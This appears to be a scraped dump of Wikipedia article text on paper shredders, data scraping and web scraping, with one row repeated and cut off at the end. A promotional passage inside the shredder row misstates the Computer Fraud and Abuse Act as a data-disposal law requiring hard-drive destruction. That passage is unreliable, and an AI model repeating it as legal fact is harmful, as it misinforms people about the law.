534 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Paper_shredder | A paper shredder is a mechanical device used to cut sheets of paper into either strips or fine particles. Government organizations, businesses, and private individuals use shredders to destroy private, confidential, or otherwise sensitive documents. The first paper shredder is credited to prolific inventor Abbot Augustus Low, whose patent was filed on February 2, 1909. 1 His invention was however never manufactured because the inventor died prematurely soon after filing the patent. 2 Adolf Ehinger's paper shredder, based on a hand-crank pasta maker, was the first to be manufactured in 1935 in Germany. Supposedly he created a shredding machine to shred his anti-Nazi leaflets to avoid the inquiries of the authorities. 3 Ehinger later marketed and began selling his patented shredders to government agencies and financial institutions converting from hand-crank to electric motor. 2 Ehinger's company, EBA Maschinenfabrik, manufactured the first cross-cut paper shredders in 1959 and continues to do so to this day as EBA Krug Priester GmbH Co. in Balingen. Right before the fall of the Berlin Wall, a “wet shredder” was invented in the former German Democratic Republic. To prevent paper shredders in the Ministry for State Security (Stasi) from glutting, this device mashed paper snippets with water. 2 With a shift from paper to digital document production, modern industrial shredders can process non-paper media, such as credit cards and CDs, and destroy thousands of documents in under one minute. 2 Until the mid 1980s, it was rare for paper shredders to be used by non-government entities. A high-profile example of their use was when the U.S. embassy in Iran used shredders to reduce paper pages to strips before the embassy was taken over in 1979, but some documents were reconstructed from the strips, as detailed below. After Colonel Oliver North told Congress that he used a Schleicher cross-cut model to shred Iran-Contra documents, sales for that company increased nearly 20 percent in 1987. 4 Paper shredders became more popular among U.S. citizens with privacy concerns after the 1988 Supreme Court decision in California v. Greenwood; in which the Supreme Court of the United States held that the Fourth Amendment does not prohibit the warrantless search and seizure of garbage left for collection outside of a home. Anti-burning laws also resulted in increased demand for paper shredding. More recently, concerns about identity theft have driven increased personal use, 5 with the US Federal Trade Commission recommending that individuals shred financial documents before disposal. 6 Information privacy laws such as FACTA, HIPAA, and the Gramm Leach Bliley Act are driving shredder usage, as businesses and individuals take steps to securely dispose of confidential information. Shredders range in size and price from small and inexpensive units designed for a certain amount of pages, to large expensive units used by commercial shredding services and can shred millions of documents per hour. While the very smallest shredders may be hand-cranked, most shredders are electrically powered. Shredders over time have added features to improve the shredder user's experience. Many now reject paper that is fed over capacity to avoid jams; others have safety features to reduce risks. 7 8 Some shredders designed for use in shared workspaces or department copy rooms have noise reduction. 
Larger organisations or shredding services sometimes use "mobile shredding trucks", typically constructed as a box truck with an industrial-size paper shredder mounted inside and space for storage of the shredded materials. Such a unit may also offer the shredding of CDs, DVDs, hard drives, credit cards, and uniforms, among other things. 9 A 'shredding kiosk' is an automated retail machine (or kiosk) that allows public access to a commercial or industrial-capacity paper shredder. This is an alternative solution to the use of a personal or business paper shredder, where the public can use a faster and more powerful shredder, paying for each shredding event rather than purchasing shredding equipment. Some companies outsource their shredding to 'shredding services'. These companies either shred on-site, with mobile shredder trucks, or have off-site shredding facilities. Documents that need to be destroyed are often placed in locked bins that are emptied periodically. As well as size and capacity, shredders are classified according to the method they use and the size and shape of the shreds they produce. There are a number of standards covering the security levels of paper shredders, including: The previous DIN 32757 standard has now been replaced with DIN 66399. This is complex, 10 but can be summarized as below: The United States National Security Agency and Central Security Service produce "NSA CSS Specification 02 01 for High Security Crosscut Paper Shredders". They provide a list of evaluated shredders. 11 The International Organization for Standardization and the International Electrotechnical Commission produce "ISO IEC 21964 Information technology — Destruction of data carriers". 12 13 14 The General Data Protection Regulation (GDPR), which came into force in May 2018, regulates the handling and processing of personal data. ISO IEC 21964 and DIN 66399 support data protection in business processes. Navigating the complex landscape of federal regulations for data protection and document destruction is crucial for businesses in maintaining compliance and avoiding penalties. Understanding these regulations ensures that sensitive information, whether in digital or physical form, is handled securely. Health Insurance Portability and Accountability Act (HIPAA) - 1996: Established by the federal government, HIPAA mandates businesses to implement safeguards for protecting health information. Non-compliance can result in substantial fines. This act emphasizes the importance of handling medical records with utmost confidentiality and security. More information about HIPAA can be found on the CDC's website. Computer Fraud and Abuse Act (CFAA) - 1984: The CFAA regulates how businesses manage sensitive data on digital platforms. It underscores that simply deleting files from a hard drive doesn't guarantee data security. To ensure complete data destruction, the physical destruction of hard drive platters is necessary. Detailed information on CFAA is available at the U.S. Department of Justice website. Gramm-Leach-Bliley Act (GLBA) - The GLBA sets forth guidelines for financial institutions on the disposal and management of financial records. This act ensures that financial documents are handled and destroyed in a manner that prevents unauthorized access and misuse. The Federal Trade Commission provides further details. 
Legal Document Protection Across 32 States and Puerto Rico - A majority of states and Puerto Rico have enacted laws to safeguard identifying information managed by law firms, businesses, and government entities. These laws dictate the storage duration, handling, and destruction methods for legal documents, requiring them to be rendered unreadable or undecipherable. New York’s specific regulation can be explored at N.Y. Gen. Bus. Law 399 H. Sarbanes-Oxley Act - 2002 This act governs the retention period for business records before destruction is permissible. It's vital for businesses to be aware of these retention times to ensure compliance. For further guidance, refer to the official bill text. Fair and Accurate Credit Transactions Act (FACTA) - An amendment to the Fair Credit Report Act, FACTA protects consumers from identity theft by providing guidelines on the proper disposal and protection of customer data, including account numbers and social security numbers. The FTC’s website offers comprehensive information on FACTA. Understanding and adhering to these federal regulations is vital for businesses to ensure the secure handling and destruction of sensitive data, thereby safeguarding against breaches and maintaining compliance. Information provided by Country Mile Document Destruction. There have been many instances where it is alleged that documents have been improperly or illegally destroyed by shredding, including: To achieve their purpose, it should not be possible to reassemble and read shredded documents. In practice the feasibility of this depends on The resources put into reconstruction should depend on the importance of the document, e.g. whether it is How easy reconstruction is will depend on: Even without a full reconstruction, in some cases useful information can be obtained by forensic analysis of the paper, ink, and cutting method. The individual shredder that was used to destroy a given document may sometimes be of forensic interest. Shredders display certain device-specific characteristics, "fingerprints", like the exact spacing of the blades, the degree and pattern of their wear. By closely examining the shredded material, the minute variations of size of the paper strips and the microscopic marks on their edges may be able to be linked to a specific machine. 25 (c.f. the forensic identification of typewriters.) The resulting shredded paper can be recycled in a number of ways, including: |
535 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-11 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 
7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
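To make the 1980s "page shredding" idea in the row above concrete, the short Python sketch below converts a captured, fixed-width character page back into numeric data. The page layout, instrument symbols, and prices are invented for illustration; a real feed capture would have its own format.

# "Page shredding" sketch: convert a captured 24x80-style character page back
# into numeric data. The page layout and instrument names are made up.
import re

captured_page = """\
SYM      BID      ASK
GBPUSD   1.2745   1.2747
EURUSD   1.0832   1.0834
USDJPY 149.8200 149.8400
"""

quotes = {}
for line in captured_page.splitlines()[1:]:          # skip the header row
    fields = re.split(r"\s+", line.strip())
    if len(fields) == 3:
        symbol, bid, ask = fields
        quotes[symbol] = (float(bid), float(ask))    # characters -> numbers

mid_price = {sym: (bid + ask) / 2 for sym, (bid, ask) in quotes.items()}
print(mid_price)

The same idea scales up with pandas.read_fwf once the column widths of the captured screens are known.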
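The report-mining approach described at the end of the row, parsing static human-readable reports such as HTML or text files instead of querying the live system, can be sketched with pandas (already imported earlier in this notebook). The HTML report below is invented for illustration.

# Report-mining sketch: parse a static HTML report offline with pandas.
# The report content below is invented; pandas.read_html needs an HTML
# parser such as lxml or bs4 + html5lib, both installed at the top.
from io import StringIO
import pandas as pd

html_report = StringIO("""
<table>
  <tr><th>Invoice</th><th>Customer</th><th>Amount</th></tr>
  <tr><td>10001</td><td>Acme Corp</td><td>1250.00</td></tr>
  <tr><td>10002</td><td>Globex Ltd</td><td>980.50</td></tr>
</table>
""")

report = pd.read_html(html_report)[0]   # read_html returns a list of tables
print(report)
print("Total billed:", report["Amount"].sum())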
536 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#Semantic_annotation_recognizing | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
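The row above splits web scraping into fetching and extracting, and mentions regex-based extraction and contact scraping. Using the same libraries imported at the top of this notebook (requests, BeautifulSoup, re, urljoin), a minimal fetch-and-extract sketch might look like the following; the target URL is a placeholder and the e-mail regex is deliberately simplified.

# Minimal fetch-and-extract sketch: download one page, then pull out links
# and e-mail addresses (a simple form of "contact scraping"). The URL is a
# placeholder and the e-mail pattern is intentionally naive.
import re
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

url = "https://example.com/"  # placeholder target
response = requests.get(url, headers={"User-Agent": "demo-scraper/0.1"}, timeout=10)
response.raise_for_status()

soup = BeautifulSoup(response.text, "html.parser")

# Extraction step 1: absolute links, resolved against the page URL.
links = [urljoin(url, a["href"]) for a in soup.find_all("a", href=True)]

# Extraction step 2: naive e-mail pattern applied to the visible text.
emails = set(re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", soup.get_text(" ")))

print(f"Found {len(links)} links and {len(emails)} e-mail addresses")

From here the results could be loaded into a pandas DataFrame or a database for later analysis, as the article describes.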
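The row closes by noting that site administrators use various measures to stop or slow bots. A common scraper-side response is to check robots.txt and throttle requests; the sketch below uses only the standard library's urllib.robotparser together with requests, with a placeholder site, paths, and user-agent string.

# Politeness sketch: before fetching, consult robots.txt and honour any
# crawl delay, so the scraper is less likely to trip rate limits or blocks.
# The target site, paths, and user-agent string are placeholders.
import time
from urllib.parse import urljoin
from urllib.robotparser import RobotFileParser

import requests

base = "https://example.com/"
agent = "demo-scraper/0.1"

robots = RobotFileParser()
robots.set_url(urljoin(base, "/robots.txt"))
robots.read()

pages = ["/", "/about", "/contact"]
delay = robots.crawl_delay(agent) or 1.0  # fall back to 1 s between requests

for path in pages:
    page_url = urljoin(base, path)
    if not robots.can_fetch(agent, page_url):
        print("Skipping disallowed page:", page_url)
        continue
    response = requests.get(page_url, headers={"User-Agent": agent}, timeout=10)
    print(page_url, response.status_code)
    time.sleep(delay)  # throttle to avoid hammering the server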
538 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-6 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
